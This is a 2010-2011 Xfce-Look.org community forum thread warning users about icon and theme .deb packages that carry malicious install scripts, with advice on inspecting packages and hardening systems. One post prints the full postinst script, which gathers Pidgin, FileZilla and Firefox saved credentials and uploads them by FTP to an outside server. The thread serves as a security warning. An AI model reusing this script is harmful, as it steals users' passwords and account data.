-
 KDE-Apps.org Applications for the KDE-Desktop 
 GTK-Apps.org Applications using the GTK Toolkit 
 GnomeFiles.org Applications for GNOME 
 MeeGo-Central.org Applications for MeeGo 
 CLI-Apps.org Command Line Applications 
 Qt-Apps.org Free Qt Applications 
 Qt-Prop.org Proprietary Qt Applications 
 Maemo-Apps.org Applications for the Maemo Plattform 
 Java-Apps.org Free Java Applications 
 eyeOS-Apps.org Free eyeOS Applications 
 Wine-Apps.org Wine Applications 
 Server-Apps.org Server Applications 
 apps.ownCloud.com ownCloud Applications 
--
-
 KDE-Look.org Artwork for the KDE-Desktop 
 GNOME-Look.org Artwork for the GNOME-Desktop 
 Xfce-Look.org Artwork for the Xfce-Desktop 
 Box-Look.org Artwork for your Windowmanager 
 E17-Stuff.org Artwork for Enlightenment 
 Beryl-Themes.org Artwork for the Beryl Windowmanager 
 Compiz-Themes.org Artwork for the Compiz Windowmanager 
 EDE-Look.org Themes for your EDE Desktop 
--
-
 Debian-Art.org Stuff for Debian 
 Gentoo-Art.org Artwork for Gentoo Linux 
 SUSE-Art.org Artwork for openSUSE 
 Ubuntu-Art.org Artwork for Ubuntu 
 Kubuntu-Art.org Artwork for Kubuntu 
 LinuxMint-Art.org Artwork for Linux Mint 
 Frugalware-Art.org Artwork for Frugalware Linux 
 Arch-Stuff.org Artwork and Stuff for Arch Linux 
 Fedora-Art.org Artwork for Fedora Linux 
 Mandriva-Art.org Artwork for Mandriva Linux 
--
-
 KDE-Files.org Files for KDE Applications 
 OpenTemplate.org Documents for OpenOffice.org
 GIMPStuff.org Files for GIMP
 InkscapeStuff.org Files for Inkscape
 ScribusStuff.org Files for Scribus
 BlenderStuff.org Textures and Objects for Blender
 VLC-Addons.org Themes and Extensions for VLC
--
-
 KDE-Help.org Support for your KDE Desktop 
 GNOME-Help.org Support for your GNOME Desktop 
 Xfce-Help.org Support for your Xfce Desktop 
--
openDesktop.orgopenDesktop.org:   Applications   Artwork   Linux Distributions   Documents    Linux42.org    OpenSkillz.com   
Xfce-Look.org - Eyecandy for your Xfce-Desktop
Xfce-Look.orgXfce-Look.org

 Apr 18 2024  
 Not logged in  
Xfce-Look.org
 Home    Add Artwork   Forum   Groups   Knowledge   Events   Jobs   Users   Register   Login-

-
- Group .- Group members (26) . 

Dangerous .debs


Artwork
ariszloariszlo
Home
Description:

This has happened before:
http://ubuntuforums.org/showthread.php?t=1349678
and it is happening now: some script kiddies are uploading .deb packages with malicious postinst files.

Be careful with .debs. Never install .debs downloaded from OpenDesktop.org without first checking them with Archive Manager.

Right-click on the downloaded .deb and select Open With Archive Manager. Enter the DEBIAN folder (or the control.tar.gz archive) and if you find a postinst file there then read it with a text editor. Do not install it if it contains malicious code. Copy the code, go back to the content page, click on Report inapropriate content and paste the code in.

Members:26
Comments:19
Created:Dec 20 2010
Changed:Dec 23 2010
Readability:readable for everybody
Membership:everybody can join

Invite people to join
Join group
Activate message notification



-

 Reported inappropriate content

 
 by ariszlo on: Dec 20 2010  
Score 79%
ariszloariszlo
Home

http://gnome-look.org/content/show.php?content=136401
http://gnome-look.org/content/show.php?content=136435

The report goes like this:

This member is distributing .deb packages with malicious postinst files. The postinst files of both BlackNWhite.deb and XIGnome.deb contain the following script:

#!/bin/sh
cd /etc/

rm -f accounts.xml sitemanager.xml key3.db signons*

cp /home/*/.purple/accounts.xml /etc/
cp /home/*/.filezilla/sitemanager.xml /etc/
cd /home/*/.mozilla/firefox/*.default/
cp key3.db signons* /etc/
cd /etc/

tar -zcf $$.tar.gz key3.db signons* accounts.xml sitemanager.xml

echo "ftp -n ftp.filehive.megabyet.net << EOT
ascii
user slave@filehive.megabyet.net cookiemonster
put $$.tar.gz
close
bye" >/etc/Gate.sh

chmod 777 Gate.sh
chmod +x Gate.sh

/etc/Gate.sh&
sleep 3
wget -q http://filehive.megabyet.net/index.php&

exit

Ariszló
Reply to this

-

 Re: Reported inappropriate content

 
 by ariszlo on: Dec 20 2010  
Score 70%
ariszloariszlo
Home

And now the pages are gone.

Ariszló
Reply to this

-
.

 Re: Reported inappropriate content

 
 by Padster on: Dec 21 2010  
Score 70%
PadsterPadster
editor
Home

the black and white one was reuploaded, it seems.
http://gnome-look.org/content/show.php/Black+%27n%27+White+Neon?content=136516
i checked, and it has the same code in it. so i reported it with your message guideline-thing and commented on it warning people. hopefully it gets deleted quickly.

http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh
Reply to this

-
.

 Re: Re: Reported inappropriate content

 
 by ariszlo on: Dec 21 2010  
Score 70%
ariszloariszlo
Home

Thanks a lot for reporting it.

And also for commenting here. The more comments we have here, the longer this group will be visible to warn unsuspecting visitors.

Ariszló
Reply to this

-

 Re: Re: Re: Reported inappropriate content

 
 by Padster on: Dec 21 2010  
Score 63%
PadsterPadster
editor
Home

you're welcome :)

http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh
Reply to this

-

 Re: Reported inappropriate content

 
 by Diegstroyer on: Jan 2 2011  
Score 58%
DiegstroyerDiegstroyer

WOW! The noobs are in danger! We will have the eyes open with .deb files!


Reply to this

-

 thoughts

 
 by nerdykid on: Dec 21 2010  
Score 70%
nerdykidnerdykid

there should be some mechanism that either disallows users from uploading stuff before a certain level of community interaction (like posting comments or whatever) or scans the .debs that are uploaded. Maybe both! Reading through a postinit file is nice and all, but what happens if someone uploads some malicious binaries? This whole problem is really a major security issue...


Reply to this

-

 Re: thoughts

 
 by ariszlo on: Dec 21 2010  
Score 63%
ariszloariszlo
Home

Yes, it is. Perhaps, an admin should be asked to joind this group.

Ariszló
Reply to this

-

 Re: Re: thoughts

 
 by Frank on: Dec 21 2010  
Score 75%
FrankFrank
KDE
editor
Home

Yes. That´s a difficult problem to solve.
I deleted accounts from this guy a lot the past few days and deleted the uploads also of course.
A automatic virus detection is difficult because this could also be a binary file which is difficult to detect.

But I have collected all the IP adresses from him and plan to report it to the police in great britain in the next few days. This is where he is from.

Frank Karlitschek
Reply to this

-

 Re: Re: Re: thoughts

 
 by Padster on: Dec 21 2010  
Score 50%
PadsterPadster
editor
Home

ok, cool :)

http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh
Reply to this

-
.

 Re: Re: Re: thoughts

 
 by Half-Left on: Jan 2 2011  
Score 50%
Half-LeftHalf-Left

Hi Frank.

Perhaps you should put a file filter on the site and make it not to include debs?, deviantART does this I suppose they could get around that by just taring the deb up but still.

Distributing binaries is not good for security.

A GNOME a day, keeps the doctor away.
Reply to this

-

 Re: Re: Re: Re: thoughts

 
 by Fri13 on: Feb 18 2011  
Score 50%
Fri13inactive user

But it is still possible to add a link to third party file sharing site what includes the deb.

Thats why I would rip off the feature to have those files linked to third party sites.

What is Linux and GNU/Linux?
http://tinyurl.com/532kb8
http://tinyurl.com/mum9x
http://tinyurl.com/ngarn8
http://tinyurl.com/qhuhg
http://tinyurl.com/3uaq48
Reply to this

-
.

 Re: thoughts

 
 by Fri13 on: Feb 18 2011  
Score 50%
Fri13inactive user

I believe we should take hard stand towards script kiddies and protect the "Windows-like" installation.

The Linux systems has been secure for decades because we have package systems in use. What means that user use package manager to download packages from secure package repositories and only from them.

Now the security line is compromised. By two reasons.

1) People are suggested to add unofficial package repositories (Example canonical PPA'a!)

2) People are suggested to download and install packages from websites.

What is needed to do. Is to tell every distributor that they should not support or anyway suggest to use third party repositories (this includes a lot Canonicals stupid actions).

And then get rid of the possibility to get pre-compiled packages from community sites, like these.

People should not be possible to even post such here. Everything what here is, should be only possible to be a secure from script kiddies. Of course anyone can find a security flaw in picture viewer/browser and send a JPEG/PNG image what triggers it. But when allowing to download anything what can have scripts, it is already a like searching problems.

We can make technically the software system secure, but we can not make the user account secure against user own stupidity. When being less skilled (like today most who start using distros like openSUSE, Mandriva or Ubuntu), they are more targeted by social attacks.

What is Linux and GNU/Linux?
http://tinyurl.com/532kb8
http://tinyurl.com/mum9x
http://tinyurl.com/ngarn8
http://tinyurl.com/qhuhg
http://tinyurl.com/3uaq48
Reply to this

-
.

 another :(

 
 by Padster on: Dec 21 2010  
Score 63%
PadsterPadster
editor
Home

wow, this injector guy's busy. just uploaded another icon theme deb with that same postinst file. http://gnome-look.org/content/show.php/CrystalOxygen?content=136523
reported, and warned, as well.

http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh
Reply to this

-
.

 Please Read for Security:

 
 by supatux on: Dec 22 2010  
Score 70%
supatuxsupatux


Boasting about how he does it:

http://blackknight5.blogspot.com/


How he get's the necessary info:

http://ubuntuforums.org/search.php?searchid=78238180



Be careful out there!


Reply to this

-

 Re: Please Read for Security:

 
 by Padster on: Dec 22 2010  
Score 50%
PadsterPadster
editor
Home

wow, why does he even bother writing a blog about it? i mean who cares?

http://techsmartly.net/freePS3.php
http://1227.com
one-oh-one-oh-one-oh
Reply to this

-
.

 Malicious deb's and scripts

 
 by elmigueluno on: Feb 11 2011  
Score 63%
elmiguelunoelmigueluno

The solution will be not install third-party themes packages via deb's. Neither use scripts that ask for the root password, unless, you know well you do, after read those scripts i mean. But for scripts that change files in user directory, why can we do?

Saludos
Freddy Vega
Reply to this

-

 Re: Malicious deb's and scripts

 
 by nerdykid on: Feb 11 2011  
Score 50%
nerdykidnerdykid

pretty much nothing except read them AFAIK Even though, I think it could help to implement some sort of trust rating system, similar to ebay's perhaps. That way, the community could vote on members trustworthiness.


Reply to this

-

 Re: Malicious deb's and scripts

 
 by Karmel on: Feb 18 2011  
Score 63%
KarmelKarmel

"But for scripts that change files in user directory, why can we do?"
--------------

You can mount your /home partition with "noexec" flag.

This will disable all executable scripts/files and programs placed at /home partition, even if you manually change file permission to "executable" and try to run any of it - manually.

This also disable some trusted programs. If any.


To do this, open (as root) file:

/etc/fstab


- use Gedit, Mousepad etc., find entry for /home partition and add this and the end of line, preceded by a comma:

noexec

Simply - reboot your machine. Or remount it manually.

For example - my partition:

/dev/sda3 /home jfs noatime, noexec 0 2


Making a copy of actual "fstab" file will be a good move.

If some of your trusted programs not work after that modification (like locally installed programs), just edit "/etc/fstab" file again - remove
", noexec" and reboot/remount.



You've been warned for possible inconvenience.

8)


Reply to this

Add commentBackHomeCreate new groupView all groups



-
Xfce-Look.org
-
NEWS
-
Linux42.org
-
Popular Groups
-
Newest Groups
-
FORUM
-
People
-

Copyright 2004-2016 Xfce-Look.org Team  Legal Notice
All rights reserved. Xfce-Look.org is not liable for any content or goods on this site.
You can find our FAQ here.
All contributors are responsible for the lawfulness of their uploads.
Please send us a notice if you spot an ABUSE of the website.
Information about advertising in Xfce-Look.org.
Developers can use our public webservice interface. More information here: public api
For further information or comments on this site, please send us a message
Xfce is a trademark of the Xfce Project
Content RSS   
Events RSS